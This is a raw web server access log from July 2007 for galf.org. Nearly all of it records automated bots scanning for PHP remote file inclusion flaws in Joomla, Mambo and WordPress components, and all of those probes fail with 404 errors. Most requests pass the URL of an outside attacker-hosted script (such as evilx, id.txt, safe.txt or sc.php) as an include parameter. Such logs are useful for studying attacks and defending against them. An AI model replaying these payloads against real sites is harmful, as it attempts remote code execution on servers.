207.58.161.181 - - [22/Jul/2007:18:48:43 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:48:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:48:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:49:05 -0700] "GET /logs/index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:49:09 -0700] "GET /index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:49:18 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:49:22 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:49:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:49:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:53:19 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:53:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
150.185.222.15 - - [22/Jul/2007:18:53:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
150.185.222.15 - - [22/Jul/2007:18:53:58 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.16.15.42 - - [22/Jul/2007:18:54:30 -0700] "GET /logs/index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:54:34 -0700] "GET /index2.php?content=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.184.86 - - [22/Jul/2007:18:55:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.184.86 - - [22/Jul/2007:18:55:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:55:14 -0700] "GET /logs/index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:55:16 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:55:18 -0700] "GET /index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:55:22 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:55:22 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:56:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:56:23 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:00:18 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.89.227.61 - - [22/Jul/2007:19:00:44 -0700] "GET /logs/access_070721.log HTTP/1.0" 404 275 "-" "Wget/1.10.2" "galf.org"
64.40.99.241 - - [22/Jul/2007:19:00:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:00:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:19:01:57 -0700] "GET /logs/index.php?x=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:19:01:58 -0700] "GET /index.php?x=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:02:38 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:02:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.10.128.248 - - [22/Jul/2007:19:03:52 -0700] "GET /logs/index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:03:52 -0700] "GET /index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:19:04:30 -0700] "GET /logs/index.php?x=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:19:04:30 -0700] "GET /index.php?x=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:04:40 -0700] "GET /logs/index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:04:41 -0700] "GET /index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:19:05:24 -0700] "GET /logs/index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:05:25 -0700] "GET /index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:06:39 -0700] "GET /logs/index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:19:06:40 -0700] "GET /index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:07:11 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:07:11 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:07:46 -0700] "GET /logs/index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:07:46 -0700] "GET /index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:09:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:09:05 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:10:06 -0700] "GET /logs/template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:10:09 -0700] "GET /template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.39.108 - - [22/Jul/2007:19:10:38 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.39.108 - - [22/Jul/2007:19:10:39 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:10:49 -0700] "GET /logs/index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:10:49 -0700] "GET /index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:11:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:11:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
87.238.162.143 - - [22/Jul/2007:19:12:42 -0700] "GET /index.php?go=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:12:47 -0700] "GET /logs/index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:12:47 -0700] "GET /index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:12:54 -0700] "GET /logs/index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:12:54 -0700] "GET /index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
70.84.7.74 - - [22/Jul/2007:19:14:50 -0700] "GET /logs/index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:14:50 -0700] "GET /index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.249.73.202 - - [22/Jul/2007:19:15:38 -0700] "GET /logs/access_070423.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.84.7.74 - - [22/Jul/2007:19:16:37 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.249.73.202 - - [22/Jul/2007:19:17:21 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
64.40.99.241 - - [22/Jul/2007:19:17:24 -0700] "GET /logs/template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:17:24 -0700] "GET /template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:17:54 -0700] "GET /logs/template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:17:55 -0700] "GET /template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:20:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:20:14 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:20:22 -0700] "GET /index.php?open=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:20:44 -0700] "GET /logs/index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:20:45 -0700] "GET /index.php?go=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:20:49 -0700] "GET /logs/index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:20:50 -0700] "GET /index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:19:20:56 -0700] "GET /logs/index.php?inc=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [22/Jul/2007:19:20:56 -0700] "GET /index.php?inc=http://ri3ksk8.by.ru/CMD/sc.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:21:13 -0700] "GET /logs/index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:21:13 -0700] "GET /index.php?p=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:23:06 -0700] "GET /logs/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:23:10 -0700] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:23:34 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:23:34 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:19:24:02 -0700] "GET /logs/index.php?inc=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
141.54.1.11 - - [22/Jul/2007:19:24:02 -0700] "GET /index.php?inc=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:25:42 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:25:42 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:26:20 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:19:26:20 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:27:04 -0700] "GET /logs/index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:27:04 -0700] "GET /index.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:27:18 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:27:19 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:19:27:23 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:29:57 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.154.246.87 - - [22/Jul/2007:19:29:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:30:34 -0700] "GET /logs/template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:30:36 -0700] "GET /template.php?pagina=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:30:44 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.114.133.27 - - [22/Jul/2007:19:30:45 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.100.11.27 - - [22/Jul/2007:19:31:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
208.100.11.27 - - [22/Jul/2007:19:31:20 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:31:44 -0700] "GET /logs/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:31:44 -0700] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
217.112.41.50 - - [22/Jul/2007:19:31:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.112.41.50 - - [22/Jul/2007:19:31:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:31:51 -0700] "GET /logs/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:31:52 -0700] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:32:12 -0700] "GET /logs/index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:19:32:12 -0700] "GET /index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:32:39 -0700] "GET /logs/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:19:32:39 -0700] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:19:33:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [22/Jul/2007:19:33:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:33:57 -0700] "GET /logs/index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:19:33:57 -0700] "GET /index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:35:32 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:19:35:32 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:19:35:38 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.92.150 - - [22/Jul/2007:19:36:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:19:36:06 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:19:36:10 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
